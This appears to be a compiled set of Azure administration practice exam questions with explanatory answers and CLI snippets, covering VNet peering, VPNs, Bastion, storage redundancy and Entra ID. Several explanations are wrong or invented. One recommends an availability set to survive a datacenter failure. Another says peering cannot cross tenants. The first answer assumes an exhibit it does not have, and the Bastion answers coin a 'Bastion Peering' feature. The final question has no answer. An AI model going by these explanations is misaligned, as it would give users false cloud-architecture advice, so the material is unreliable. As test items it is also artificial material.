Azure VNet Peering allows direct communication between VNets. However, Azure does not support transitive routing by default. This means that a VNet can communicate only with directly peered VNets, not indirectly connected ones. Analyzing the Peering Configuration: Since we don't have the actual exhibit, let's assume a typical scenario based on the answer given: VNet1 is peered with VNet2. VNet2 is NOT directly peered with VNet3. VNet1 and VNet3 might be peered, but VNet2 has no direct peering with VNet3. Routing Behavior in Azure Peering: VNet2 can send packets to VNet1 because they have a direct peering connection. VNet2 CANNOT send packets to VNet3 because Azure VNet Peering does NOT support transitive routing. Even if VNet1 is peered with VNet3, traffic from VNet2 cannot "pass through" VNet1 to reach VNet3. Why Not Other Answers? VNet3 only: VNet2 is not peered with VNet3, so traffic cannot flow directly. VNet1 & VNet3: Again, transitive routing is not enabled by default in Azure VNet Peering. How to Enable Routing to VNet3? If you want VNet2 to communicate with VNet3, you have the following options: Manually peer VNet2 with VNet3 (see the sketch below). Use a Virtual Network Gateway (VPN Gateway) and enable "Use Remote Gateways". Deploy an Azure Firewall or a Network Virtual Appliance (NVA) in VNet1 to route traffic.
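As a minimal sketch of the first option (assuming both VNets are in the same subscription and a resource group named RG1; peering must be created in both directions):
# Peer VNET2 and VNET3 directly so traffic no longer depends on transitive routing.
az network vnet peering create -g RG1 -n VNET2-to-VNET3 --vnet-name VNET2 --remote-vnet VNET3 --allow-vnet-access
az network vnet peering create -g RG1 -n VNET3-to-VNET2 --vnet-name VNET3 --remote-vnet VNET2 --allow-vnet-access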
Your company has virtual machines hosted in Microsoft Azure. The VMs are located in a single Azure virtual network named VNet1. The company has users that work remotely. The remote workers require access to the VMs on VNet1. You need to provide access for the remote workers. What should you do?
Configure a Point-to-Site (P2S) VPN
Configure a Site-to-Site (S2S) VPN
Configure a multisite VPN
Configure a VNET to VNET VPN
A Point-to-Site (P2S) VPN is designed for individual remote users to securely connect to an Azure Virtual Network (VNet) from their personal devices (such as laptops or home PCs). This is the ideal solution when remote workers need access to resources (like VMs) inside VNet1. Why P2S VPN is the Right Choice? Designed for Remote Workers: P2S VPN allows individual users to securely connect from anywhere using a VPN client. No Need for a Physical Site-to-Site Connection: Unlike Site-to-Site (S2S) VPN, which requires a corporate network with a VPN device, P2S only requires a single user device with a VPN client. Easy Setup and Management: Users can connect using Azure VPN Client, OpenVPN, or SSTP protocols, without requiring dedicated networking hardware.
You have an Azure virtual network named VNET1 that has an IP address space of 192.168.0.0/16 and the following subnets: + Subnet1 has an IP address range of 192.168.1.0/24 and is connected to 15 VMs. + Subnet2 has an IP address range of 192.168.2.0/24 and does NOT have any VMs connected. You need to ensure that you can deploy Azure Firewall to VNET1. What should you do?
Add a new subnet to VNET1
Add a service endpoint to Subnet2
Modify the subnet mask of Subnet2
Modify the IP address space of VNET1
Azure Firewall requires a dedicated subnet named AzureFirewallSubnet with a minimum subnet size of /26 (e.g., 192.168.x.0/26). Since VNET1 currently has only Subnet1 and Subnet2, you need to add a new subnet specifically for Azure Firewall before deploying it. Why is Adding a New Subnet Required? Azure Firewall must be deployed in a subnet named AzureFirewallSubnet. Existing subnets cannot be renamed after creation, so Subnet1 and Subnet2 cannot be used for the firewall. Azure Firewall requires a subnet size of at least /26, which means at least 64 available IP addresses. A new subnet must be created in the existing VNet to host the firewall. Solution: Steps to Deploy Azure Firewall Add a new subnet to VNET1 with the name AzureFirewallSubnet. Ensure the new subnet has a subnet mask of /26 or larger (e.g., 192.168.3.0/26). Deploy Azure Firewall in the AzureFirewallSubnet. Configure routing rules to direct traffic through the firewall.
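A minimal Azure CLI sketch of these steps, assuming a resource group named RG1 and the East US region (the firewall commands come from the azure-firewall CLI extension):
# 1. Create the dedicated subnet (the name AzureFirewallSubnet is mandatory, /26 or larger).
az network vnet subnet create -g RG1 --vnet-name VNET1 -n AzureFirewallSubnet --address-prefixes 192.168.3.0/26
# 2. Create the firewall and attach a Standard public IP to it.
az network firewall create -g RG1 -n FW1 -l eastus
az network public-ip create -g RG1 -n FW1-pip --sku Standard
az network firewall ip-config create -g RG1 -f FW1 -n fw-ipconfig --public-ip-address FW1-pip --vnet-name VNET1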
You have an Azure subscription that contains the following fully peered virtual networks: + VNet1, located in the West US region. 5 virtual machines are connected to VNet1. + VNet2, located in the West US region. 7 virtual machines are connected to VNet2. + VNet3, located in the East US region. 10 virtual machines are connected to VNet3. + VNet4, located in the East US region. 4 virtual machines are connected to VNet4. You plan to protect all of the connected virtual machines by using Azure Bastion. What is the minimum number of Azure Bastion hosts that you must deploy?
1
2
3
4
Azure Bastion is deployed per virtual network (VNet) and allows secure RDP/SSH access to virtual machines without exposing them to the public internet. However, in this scenario, all VNets (VNet1, VNet2, VNet3, and VNet4) are fully peered. Because VNets are fully peered, a single Azure Bastion deployment can serve all virtual machines across the peered networks. Why is One Azure Bastion Enough? Peered VNets Can Share Bastion Access When virtual networks are peered, Azure Bastion in one VNet can provide access to VMs in all peered VNets. This is known as “Bastion Peering”, and it allows VMs across peered VNets to use a single Bastion host. Azure Bastion Works Across Regions if Peering Exists Even though VNet1 and VNet2 are in West US and VNet3 and VNet4 are in East US, they are fully peered. Cross-region peering supports Bastion connectivity, so one Bastion host in any of the peered VNets can provide access to all the VMs. Minimizing Costs and Management Overhead Azure Bastion is a managed service with per-hour billing, so deploying multiple instances increases cost. A single Bastion in one VNet reduces unnecessary expenses while maintaining secure access.
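A minimal sketch of deploying that single Bastion host, assuming a resource group named RG1, that it is placed in VNET1 (West US), and that the chosen address prefix for the required AzureBastionSubnet is free within VNET1 (it may require the bastion CLI extension):
# Azure Bastion needs a subnet named AzureBastionSubnet and a Standard static public IP.
az network vnet subnet create -g RG1 --vnet-name VNET1 -n AzureBastionSubnet --address-prefixes 10.0.254.0/26
az network public-ip create -g RG1 -n Bastion-pip --sku Standard --allocation-method Static
az network bastion create -g RG1 -n Bastion1 --vnet-name VNET1 --public-ip-address Bastion-pip --location westus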
You have an Azure subscription that contains the virtual networks shown in the following table. All the virtual networks are peered. Each virtual network contains nine virtual machines. You need to configure secure RDP connections to the virtual machines by using Azure Bastion. What is the minimum number of Bastion hosts required?
1
5
7
10
Azure Bastion is deployed per virtual network (VNet), but it can be shared across fully peered VNets. Since all VNets in this scenario are peered, a single Azure Bastion deployment can provide secure RDP/SSH access to virtual machines across all peered virtual networks. Key Considerations for Azure Bastion: Bastion Works Across Peered VNets Azure Bastion in one VNet can be used to connect securely to VMs in any peered VNet. Since all VNets in the scenario are fully peered, a single Bastion instance is enough. Cross-Region Peering Supports Bastion Even though the VNets span multiple regions (US East, UK South, Asia East), they are still peered, allowing Bastion to function across regions. Bastion peering works even in different geographic locations if the networks are peered. Minimizing Cost and Management Complexity Azure Bastion is billed per-hour, so deploying multiple instances increases costs. A single Bastion instance in one of the peered VNets can serve all VNets, reducing expenses and management effort.
You have an Azure subscription that contains resources as shown in the following table: You need to create a Network Interface named NIC1. In which location should you create NIC1?
East US and North Europe only
EastUS only
East US, West Europe, and North Europe
East US, West Europe only
A Network Interface Card (NIC) in Azure must be created in the same region as the virtual network (VNet) it connects to. VNET1 is located in East US. A NIC must be in the same region as its VNet because a NIC is bound to a virtual network and cannot function across different regions. Other resources like public IPs or route tables do not impact the NIC’s required location. Since VNET1 is in East US, NIC1 must also be created in East US to be associated with this VNet.
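For example (the resource group RG1 and the subnet name Subnet1 are assumptions, since the exhibit table is not shown), the NIC would be created in East US alongside VNET1:
# Create NIC1 in the same region as VNET1 (East US) and attach it to a subnet of VNET1.
az network nic create \
  --resource-group RG1 \
  --name NIC1 \
  --location eastus \
  --vnet-name VNET1 \
  --subnet Subnet1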
You have two subscriptions named Subscription1 and Subscription2. Each subscription is associated with a different Azure AD tenant. + Subscription1 contains a virtual network named VNet1. + VNet1 contains an Azure virtual machine named VM1 and has an IP address space of 10.0.0.0/16. + Subscription2 contains a virtual network named VNet2. + VNet2 contains an Azure virtual machine named VM2 and has an IP address space of 10.10.0.0/24. You need to connect VNet1 to VNet2. What should you do first?
Move VM1 to Subscription2
Move VNet1 to Subscription2
Modify the IP address space of VNet2
Provision virtual network gateways
Azure virtual network (VNet) peering is the most common way to connect virtual networks, but peering is only possible when both VNets are in the same Azure AD tenant. Since Subscription1 and Subscription2 belong to different Azure AD tenants, VNet Peering is NOT an option. Instead, the only way to connect VNet1 (in Subscription1) and VNet2 (in Subscription2) is by using an Azure VPN Gateway. Steps to Connect VNets Across Different Azure AD Tenants: Deploy a VPN Gateway in VNet1 (Subscription1). Deploy another VPN Gateway in VNet2 (Subscription2). Configure a Site-to-Site VPN between the two VNets using the VPN Gateways. Establish connectivity so that VM1 and VM2 can communicate securely. This is called a VNet-to-VNet (V2V) VPN connection, which allows VNets in different subscriptions and tenants to communicate (see the sketch below). Key Takeaways: VNet peering does NOT work across different Azure AD tenants. A VPN Gateway is required to connect VNets from different subscriptions and tenants. VNet-to-VNet (V2V) VPN allows communication between VNets in different subscriptions.
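Once a gateway exists in each VNet, the cross-subscription connection itself can be sketched as follows (gateway names, resource groups, the shared key, and the remote gateway's resource ID are all placeholders; a matching connection must also be created from the VNet2 side):
# Connect the local gateway (GW1 in Subscription1) to the remote gateway in Subscription2 by resource ID.
az network vpn-connection create \
  --resource-group RG1 \
  --name VNet1-to-VNet2 \
  --vnet-gateway1 GW1 \
  --vnet-gateway2 "/subscriptions/<subscription2-id>/resourceGroups/RG2/providers/Microsoft.Network/virtualNetworkGateways/GW2" \
  --shared-key "<shared-key>"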
You have an Azure subscription that contains an Azure virtual network named Vnet1 with an address space of 10.1.0.0/18 and a subnet named Sub with an address space of 10.1.0.0/22. You need to connect your on-premises network to Azure by using a site-to-site VPN. Which four actions should you perform in sequence? Instructions: Select the correct order. Each correct match is worth one point. a) Deploy a local network gateway b) Deploy a VPN gateway c) Deploy a VPN connection d) Deploy a gateway subnet
a,b,c,d
b,a,c,d
d,c,a,b
d,c,b,a
Step 1: Deploy a Gateway Subnet (d) Before you can create a VPN Gateway, you must reserve a subnet specifically for the gateway in your virtual network. The GatewaySubnet is required to host the VPN Gateway. Step 2: Deploy a VPN Gateway (b) A VPN Gateway is a virtual network gateway in Azure that enables encrypted communication between your on-premises network and Azure. The VPN Gateway is deployed in the GatewaySubnet. Step 3: Deploy a Local Network Gateway (a) A Local Network Gateway (LNG) represents your on-premises network in Azure. It stores your on-premises network’s public IP address and subnet information. Step 4: Deploy a VPN Connection (c) After both VPN Gateway (Azure) and Local Network Gateway (on-premises) are set up, you create a Site-to-Site VPN connection between them. This establishes secure connectivity between Azure and your on-premises environment.
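A minimal Azure CLI sketch of the four steps in order (the resource group RG1, resource names, the gateway subnet prefix, the on-premises public IP, and the on-premises address prefix are all assumptions):
# d) Gateway subnet (the name GatewaySubnet is mandatory; prefix chosen inside 10.1.0.0/18 but outside Sub)
az network vnet subnet create -g RG1 --vnet-name Vnet1 -n GatewaySubnet --address-prefixes 10.1.63.0/27
# b) VPN gateway (needs a public IP; deployment can take 30+ minutes)
az network public-ip create -g RG1 -n VpnGw-pip --sku Standard
az network vnet-gateway create -g RG1 -n VpnGw --vnet Vnet1 --public-ip-addresses VpnGw-pip --gateway-type Vpn --vpn-type RouteBased --sku VpnGw1
# a) Local network gateway representing the on-premises site
az network local-gateway create -g RG1 -n OnPremGw --gateway-ip-address <on-prem-public-ip> --local-address-prefixes 192.168.0.0/24
# c) Site-to-site VPN connection between the two gateways
az network vpn-connection create -g RG1 -n S2SConnection --vnet-gateway1 VpnGw --local-gateway2 OnPremGw --shared-key "<shared-key>"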
Which choice correctly describes Microsoft Entra ID?
Microsoft Entra ID can be queried through LDAP
Microsoft Entra ID is primarily an identity solution
Microsoft Entra ID uses organizational units (OU) and group policy objects (GPOs)
Microsoft Entra ID (formerly Azure Active Directory, or Azure AD) is Microsoft’s cloud-based identity and access management (IAM) solution. It is primarily used for: User authentication and access control Single Sign-On (SSO) for apps and services Multi-Factor Authentication (MFA) Role-Based Access Control (RBAC) Identity Protection & Conditional Access Since Entra ID manages user identities and access permissions, it is primarily an identity solution rather than a traditional directory service.
You have a Microsoft Entra tenant that contains 5,000 user accounts. You create a new user account named AdminUser1. You need to assign the User Administrator administrative role to AdminUser1. What should you do from the user account properties?
From the Groups blade, invite the user account to a new group
From the Directory role blade, modify the directory role
From the Licenses blade, assign a new license
In Microsoft Entra ID (formerly Azure AD), administrative roles are managed through the Directory roles section of a user’s account. To assign the User Administrator role to AdminUser1, you need to: Go to Microsoft Entra ID (Azure AD) in the Azure portal. Select “Users” and search for AdminUser1. Click on “Assigned roles” or “Directory roles”. Modify the role by selecting “User Administrator” and saving the changes. This role grants AdminUser1 permission to manage user accounts, including: Creating, editing, and deleting users. Assigning and resetting passwords. Managing some user-related policies.
You are configuring a wireless router for a home office. Which modification will have the least effect on enhancing network security?
Changing the default username and password.
Disabling guest access.
Disabling the SSID broadcast.
Configuring WPA3.
Disabling the SSID broadcast (which hides the network name) has the least effect on enhancing network security because it only obscures the network from casual users—not from attackers. Skilled attackers using basic tools can still detect hidden networks through packet sniffing. Why the others are more effective: Changing the default username and password prevents unauthorized access to the router’s admin interface. Disabling guest access limits potential abuse of the network by untrusted users. Configuring WPA3 ensures the highest level of Wi-Fi encryption and protection available.
Microsoft Entra ID includes federation services, including third-party services.
Yes
No
Microsoft Entra ID (formerly Azure AD) includes federation services, allowing integration with third-party identity providers for Single Sign-On (SSO) and authentication. Key Features of Federation in Microsoft Entra ID: Supports Third-Party Identity Providers (IdPs) Microsoft Entra ID can federate with third-party services like: Google Okta PingFederate SAML 2.0 and OpenID Connect-based providers Supports Federated Authentication with On-Premises AD Microsoft Entra ID can federate with on-premises Active Directory (AD FS) to enable seamless authentication for users. Single Sign-On (SSO) for Cloud and On-Premises Apps Users can log in once and access Microsoft 365, Azure, and third-party SaaS applications without needing separate credentials. Custom Federation via Microsoft Entra ID B2B & B2C Microsoft Entra B2B (Business-to-Business): Enables external users (partners, suppliers) to access resources using their own identity provider. Microsoft Entra B2C (Business-to-Consumer): Allows customers to sign in with Google, Facebook, Twitter, or any other IdP.
An identity defines a dedicated and trusted instance of Microsoft Entra ID?
Yes
No
An identity in Microsoft Entra ID refers to a user, service, or device that is authenticated and authorized to access resources. However, an identity does NOT define a dedicated and trusted instance of Microsoft Entra ID. Instead, a Microsoft Entra tenant (formerly called Azure AD tenant) is what represents a dedicated and trusted instance of Microsoft Entra ID.
Azure tenant defines a dedicated and trusted instance of Microsoft Entra ID?
Yes
No
An Azure tenant (also known as a Microsoft Entra ID tenant) is a dedicated and trusted instance of Microsoft Entra ID that organizations use to manage identities and access. Key Points: Dedicated Instance: Each organization gets a separate and isolated Microsoft Entra ID tenant. This ensures that identity management, authentication, and authorization are specific to that organization. Trust & Security: The tenant is trusted because Microsoft guarantees its security, compliance, and access management features. It enables organizations to securely manage users, groups, and applications. Scope of an Azure Tenant: It manages identity for users, devices, and applications. It controls access to Azure resources and Microsoft 365 services. Example: Company: Contoso Ltd. Azure Tenant: contoso.onmicrosoft.com The tenant is a trusted instance that Contoso uses to manage all its users, apps, and security policies.
You plan to deploy three Azure virtual machines named VM1, VM2, and VM3. The virtual machines will host a web app named App1. You need to ensure that at least two virtual machines are available if a single Azure datacenter becomes unavailable. What should you deploy?
each virtual machine in a separate Availability Zone
each virtual machine in a separate Availability Set
all virtual machines in a single Availability set
all three virtual machines in a single Availability Zone
In Azure, Availability Sets and Availability Zones are used to improve the availability and reliability of virtual machines (VMs). Here’s why an availability Set is the right choice in this case: 1. Understanding Availability Sets An Availability Set ensures that VMs are distributed across multiple fault domains and update domains within a single Azure datacenter. Fault domains (FDs) represent physical separation within the datacenter to protect against hardware failures. Update domains (UDs) ensure that VMs are updated one at a time to avoid downtime. If a single datacenter experiences an issue, at least some VMs in the availability set will remain operational. 2. Why Availability Zones are NOT Needed? Availability Zones (AZs) provide protection against datacenter failures by spreading VMs across multiple zones. However, since the question asks for protection if a single datacenter fails, an Availability Set within a single region is sufficient. AZs are useful when needing high redundancy across different datacenters, but they introduce additional complexity and potential latency.
You have an Azure subscription that contains several hundred virtual machines. You need to identify which virtual machines are underutilized. What should you use?
Azure Advisor
Azure Monitor
Azure policies
Advisor is a digital cloud assistant that helps you follow best practices to optimize Azure deployments. It analyzes your resource configuration and usage telemetry and then recommends solutions that can help you improve the cost effectiveness, performance, reliability, and security of your Azure resources. Azure provides multiple tools for monitoring and optimizing cloud resources. In this case, Azure Advisor is the best choice because it provides recommendations for underutilized virtual machines (VMs) to help optimize costs. Why Azure Advisor? Azure Advisor analyzes resource usage patterns and gives recommendations for cost savings, security improvements, and best practices. It identifies underutilized VMs by checking their CPU and network activity over a period of time. If a VM has consistently low utilization (e.g., low CPU usage or low network traffic), Azure Advisor suggests downsizing, shutting down, or reconfiguring the VM to reduce costs. It provides right-sizing recommendations for VM types based on actual usage.
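For example, the cost recommendations (which include right-size or shutdown suggestions for underutilized VMs) can be pulled with the Azure CLI:
# List Azure Advisor cost recommendations for the current subscription.
az advisor recommendation list --category Cost --output table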
You host a service with two Azure virtual machines. You discover that occasional high traffic causes your instances to not respond or even to fail. Which two actions can you do to minimize the impact of the unusual traffic without reducing the performance of your architecture?
Add a load balancer and put the virtual machines in a scale set.
Put the virtual machines in a scale set and add a new NSG to the subnet
Add a network gateway to the Virtual Network.
Add a load balancer and put the virtual machines in an availability set
Your issue is that occasional high traffic is causing your virtual machines (VMs) to become unresponsive or even fail. To minimize the impact without reducing performance, you need to: Distribute the incoming traffic efficiently so that no single VM gets overloaded. Automatically scale the number of VMs based on traffic spikes to handle unexpected high loads. The best solution for this is: 1. Add a Load Balancer Azure Load Balancer distributes incoming traffic across multiple VMs, ensuring that no single VM is overwhelmed. It improves fault tolerance and high availability by redirecting requests to healthy VMs if one fails. This prevents downtime due to a single overloaded VM. 2. Use a Virtual Machine Scale Set (VMSS) A VM scale set automatically adds or removes VMs based on real-time traffic and workload demand. This ensures that during high traffic periods, additional VMs are provisioned automatically, and when traffic decreases, extra VMs are removed to optimize costs. Scale sets work well with load balancers, ensuring efficient distribution of incoming requests. Why Other Options Are Incorrect? Putting VMs in a scale set and adding an NSG to the subnet is not effective because NSGs only control access (security rules) and do not help with traffic distribution or scaling. Adding a network gateway to the Virtual Network is irrelevant because gateways are used for VPN or hybrid cloud connections, not for handling traffic spikes. Using a load balancer with an availability set improves uptime but does not automatically scale VMs based on demand.
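A rough sketch of this pattern with the Azure CLI (the resource group, resource names, image alias, instance counts, and CPU threshold are assumptions; az vmss create places the instances behind the named load balancer):
# Create a scale set behind a load balancer, then let it scale out on sustained CPU load.
az vmss create -g RG1 -n vmss1 --image Ubuntu2204 --instance-count 2 --vm-sku Standard_D2s_v3 --upgrade-policy-mode automatic --load-balancer web-lb
az monitor autoscale create -g RG1 --resource vmss1 --resource-type Microsoft.Compute/virtualMachineScaleSets --name vmss1-autoscale --min-count 2 --max-count 5 --count 2
az monitor autoscale rule create -g RG1 --autoscale-name vmss1-autoscale --condition "Percentage CPU > 70 avg 5m" --scale out 1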
You have an Azure virtual network that contains two subnets named Subnet1 and Subnet2. You have a virtual machine named VM1 that is connected to Subnet1. VM1 runs Windows Server. You need to ensure that VM1 is connected directly to both subnets. What should you do first?
From the Azure portal, add a network interface
From the Azure portal, create an IP group
From the Azure portal, modify the IP configurations of an existing network interface.
Sign into Windows Server and create a network bridge
In Azure, a virtual machine (VM) is connected to a subnet through a network interface card (NIC). Each NIC is assigned to one subnet within a virtual network. Since VM1 is already connected to Subnet1, to allow it to connect directly to both Subnet1 and Subnet2, you need to add an additional network interface that connects to Subnet2. Steps to Achieve This: Add a second network interface (NIC) to VM1 through the Azure portal. Attach this new NIC to Subnet2 so the VM has direct connectivity to both subnets. Configure the IP settings to ensure proper communication across subnets. Inside the VM, configure Windows Server to recognize and use both network interfaces properly. Why Other Options Are Incorrect? (b) Create an IP group An IP group in Azure is used for managing security rules, such as NSG (Network Security Group) rules. It does not allow a VM to connect to multiple subnets. (c) Modify the IP configurations of an existing network interface You cannot change the subnet assignment of an existing NIC after the VM is deployed. The only way to connect to both subnets is by adding a new NIC that belongs to Subnet2. (d) Sign into Windows Server and create a network bridge A network bridge allows a VM to act as a router between subnets, but it does not make the VM directly connected to both subnets. Azure networking does not support this approach for connecting a VM to multiple subnets.
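A minimal sketch of these steps with the Azure CLI (the resource group, VNet, and NIC names are assumptions; the VM size must support more than one NIC, and the VM has to be deallocated before a NIC can be attached):
# Attach a second NIC, connected to Subnet2, to VM1.
az vm deallocate -g RG1 -n VM1
az network nic create -g RG1 -n VM1-nic2 --vnet-name VNet1 --subnet Subnet2
az vm nic add -g RG1 --vm-name VM1 --nics VM1-nic2
az vm start -g RG1 -n VM1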
You have an Azure subscription that contains several Azure runbooks. The runbooks run nightly and generate reports. The runbooks are configured to store authentication credentials as variables. You need to replace the authentication solution with a more secure solution. What should you use?
Azure Active Directory (Azure AD) Identity Protection
Azure Key Vault
an access policy
an administrative unit
Your goal is to replace authentication credentials stored as variables in Azure runbooks with a more secure solution. The best way to store and manage sensitive information, such as authentication credentials, is Azure Key Vault. Why Azure Key Vault? Securely stores secrets, keys, and certificates rather than keeping credentials in runbook variables. Provides access control through Azure Role-Based Access Control (RBAC) and Access Policies to ensure only authorized services can retrieve secrets. Supports automatic secret rotation, reducing security risks associated with hardcoded credentials. Integrates easily with Azure Automation runbooks, allowing them to securely retrieve credentials when needed. Why Other Options Are Incorrect? (a) Azure Active Directory (Azure AD) Identity Protection Identity Protection is used for detecting and mitigating identity-related risks, such as compromised accounts. It does not store authentication credentials securely for runbooks. (c) An access policy Access policies define who can access a resource but do not store credentials themselves. While Key Vault uses access policies to control access, the actual solution for storing credentials is still Azure Key Vault. (d) An administrative unit Administrative units in Azure AD are used to delegate management of users and groups in large organizations. They do not handle authentication credentials for runbooks.
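A minimal sketch of moving a credential into Key Vault with the Azure CLI (the vault and secret names are assumptions; inside the runbook the secret would then be read at run time, for example with Get-AzKeyVaultSecret under the Automation account's managed identity):
# Create a vault, store the credential as a secret, and read it back when needed.
az keyvault create -g RG1 -n kv-automation1 -l eastus
az keyvault secret set --vault-name kv-automation1 --name RunbookCredential --value "<password>"
az keyvault secret show --vault-name kv-automation1 --name RunbookCredential --query value -o tsv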
Your wireless network has been functioning well, but suddenly you are inundated with calls from employees who can't access the network. You believe that a disgruntled employee who was just fired is causing network interference in order to perpetrate a DoS attack. What is a temporary solution in this situation?
Have everyone log off their computers and back on.
Set your router to use a different channel.
Restore the router to factory defaults.
Reset the router.
Changing the router’s Wi-Fi channel is a quick and effective temporary solution to avoid wireless interference—especially if a disgruntled former employee is using a device to jam or interfere with your current channel. Wi-Fi operates on specific frequency channels, and shifting to a different one can bypass the interference temporarily and restore network functionality. Why the others aren’t ideal as immediate solutions: Having everyone log off and back on won’t help if the issue is interference or a DoS attack. Restoring the router to factory defaults is extreme and time-consuming, and you’d lose current settings. Resetting the router might briefly restore service but won’t stop continued interference.
Your company has a general-purpose v1 Azure Storage account named storage1 that uses locally-redundant storage (LRS). You are tasked with implementing a solution that ensures the data in the storage account is protected if a zone fails. The solution must minimize costs and administrative effort. What should you do first?
Configure Object replication rules
Create a new storage account
Modify the replication settings of the storage account
Upgrade the account to general purpose V2
Your goal is to protect data if a zone fails while minimizing costs and administrative effort. The best way to achieve this is to upgrade the storage account to General Purpose V2 (GPv2) because GPv2 supports zone-redundant storage (ZRS), which LRS (Locally Redundant Storage) does not. Why Upgrade to General Purpose V2? General Purpose V1 (GPv1) accounts do not support ZRS LRS (Locally Redundant Storage) only keeps three copies of data within a single datacenter, making it vulnerable to zone failures. GPv1 does not allow an upgrade to ZRS directly. General Purpose V2 (GPv2) accounts support Zone-Redundant Storage (ZRS) After upgrading to GPv2, you can change the replication setting to ZRS to protect data across multiple availability zones. ZRS ensures that if a zone fails, data remains accessible from another zone. GPv2 also supports Geo-Zone Redundant Storage (GZRS) for even greater redundancy. Cost-Effective & Minimal Administrative Effort Upgrading from GPv1 to GPv2 does not require creating a new storage account or migrating data manually. It improves performance and adds features like lifecycle management, tiering, and ZRS without increasing costs significantly. Why Other Options Are Incorrect? (a) Configure Object Replication Rules Object replication only applies to blob storage and requires two separate storage accounts. It does not provide automatic zone redundancy like ZRS does. (b) Create a New Storage Account Creating a new account and migrating data manually is unnecessary and requires additional administrative effort. Upgrading to GPv2 is a simpler solution. (c) Modify the Replication Settings of the Storage Account In GPv1, replication settings (like LRS to ZRS) cannot be modified directly. First, you must upgrade to GPv2, then change the replication setting to ZRS or GZRS.
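A rough sketch with the Azure CLI (the resource group RG1 is an assumption; the second command requests a replication change and is only available where LRS-to-ZRS conversion is supported, otherwise a manual migration is required):
# Upgrade the account from general-purpose v1 to v2, then request zone-redundant replication.
az storage account update -g RG1 -n storage1 --set kind=StorageV2 --access-tier=Hot
az storage account update -g RG1 -n storage1 --sku Standard_ZRS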
You need to create an Azure Storage account that meets the following requirements: + Minimizes costs + Supports hot, cool, and archive blob tiers + Provides fault tolerance if a disaster affects the Azure region where the account resides. How should you complete the command? az storage account create -g RG1 -n storageaccount1 --kind ??? --sku ??? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. --kind
File Storage
Storage
StorageV2
To meet the requirements—minimizing costs, supporting multiple blob tiers (hot, cool, archive), and ensuring fault tolerance across regions—the correct option for –kind is StorageV2. Breakdown of the Requirements: Minimizing Costs StorageV2 provides cost-efficient options like tiering (Hot, Cool, Archive) for Blob Storage, allowing you to optimize costs by storing infrequently accessed data in cheaper tiers. Supporting Hot, Cool, and Archive Blob Tiers Only StorageV2 supports all three blob tiers: Hot: Optimized for frequently accessed data Cool: Cost-effective for infrequently accessed data Archive: The cheapest option for rarely accessed data (e.g., backups, compliance data) Providing Fault Tolerance Across Regions You need a geo-redundant storage (GRS) option for disaster recovery. StorageV2 supports replication options like Geo-Redundant Storage (GRS) and Geo-Zone-Redundant Storage (GZRS), which replicate data across multiple Azure regions. Why Other Options Are Incorrect? FileStorage Used for Azure Files, not Blob Storage. Does not support hot, cool, and archive tiers. Storage This is the older (classic) storage account type, mainly for backward compatibility. Does not support all blob tiering options (Cool and Archive tiers are missing). Does not provide the cost efficiency and replication options available in StorageV2.
You need to create an Azure Storage account that meets the following requirements: + Minimizes costs + Supports hot, cool, and archive blob tiers + Provides fault tolerance if a disaster affects the Azure region where the account resides. How should you complete the command? az storage account create -g RG1 -n storageaccount1 --kind ??? --sku ??? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. --sku
Standard_GRS
Standard_LRS
Standard_RAGRS
Premium_LRS
To meet the given requirements—minimizing costs, supporting hot, cool, and archive blob tiers, and ensuring fault tolerance across regions—the correct option for –sku is Standard_GRS (Geo-Redundant Storage). Breakdown of the Requirements: Minimizing Costs Standard_GRS is a cost-effective storage option that supports Blob Storage tiering (Hot, Cool, Archive). Premium_LRS, while high-performance, is significantly more expensive and is not needed for blob tiering. Supports Hot, Cool, and Archive Blob Tiers Only Standard storage tiers (LRS, GRS, and RAGRS) support all three blob tiers. Premium_LRS does not support tiering and is optimized for workloads requiring low latency and high throughput, such as virtual machine disks. Provides Fault Tolerance in Case of a Regional Disaster Geo-Redundant Storage (GRS) ensures disaster recovery by automatically copying data to a secondary Azure region. If the primary region fails, Microsoft initiates a failover to the secondary region. LRS (Locally Redundant Storage) does not provide regional redundancy and only replicates within a single data center. Why Other Options Are Incorrect? Standard_LRS Only stores three copies of data in a single datacenter. Does not provide regional fault tolerance in case of disaster. Fails to meet the disaster recovery requirement. Standard_RAGRS Read-Access Geo-Redundant Storage (RAGRS) provides read access to the secondary region before a failover. While it enhances availability, it is more expensive than GRS. Since the question asks to minimize costs, Standard_GRS is a better option unless read-access to the secondary region is explicitly needed. Premium_LRS Used for high-performance workloads such as VM disks and databases. Does not support hot, cool, and archive blob tiers. Much more expensive than Standard_GRS, making it a poor choice for cost efficiency.
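Putting both answers together, the completed command would look like this:
az storage account create -g RG1 -n storageaccount1 --kind StorageV2 --sku Standard_GRS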
You have an Azure virtual machine named VM1. VM1 was deployed by using a custom Azure Resource Manager template named ARM1.json. You receive a notification that VM1 will be affected by maintenance. You need to move VM1 to a different host immediately. Solution: From the Update management blade, you click Enable. Does the solution meet the goal?
Yes
No
The goal is to move VM1 to a different host immediately to avoid maintenance impact. However, enabling Update Management from the Update Management blade does not achieve this. Why does this solution fail? Update Management is used to manage and automate software updates (patches) for VMs. It does not move the VM to a different host or help in avoiding maintenance-related downtime. Even if Update Management is enabled, the VM will still experience downtime if the host undergoes maintenance. Correct Approach to Move VM1 to a Different Host Immediately: To move VM1 to a different physical host immediately, you should use one of the following methods: Redeploy the VM. This forces Azure to migrate the VM to a new host. Steps: Open the Azure portal, navigate to VM1, go to Settings > Redeploy, and click Redeploy. PowerShell Command: Set-AzVM -ResourceGroupName "YourRG" -Name "VM1" -Redeploy Live Migration (for Planned Maintenance Events): If Azure has scheduled maintenance and Live Migration is supported, Azure may automatically move the VM without downtime. Check for maintenance events in Azure Service Health and use Maintenance Configurations for scheduled moves.
You have an Azure Storage account named storage1. You plan to use AzCopy to copy data to storage1. You need to identify the storage services in storage1 to which you can copy the data. Which storage services should you identify?
blob and file only
blob, table, and queue only
file and table only
blob, file, table, and queue
file only
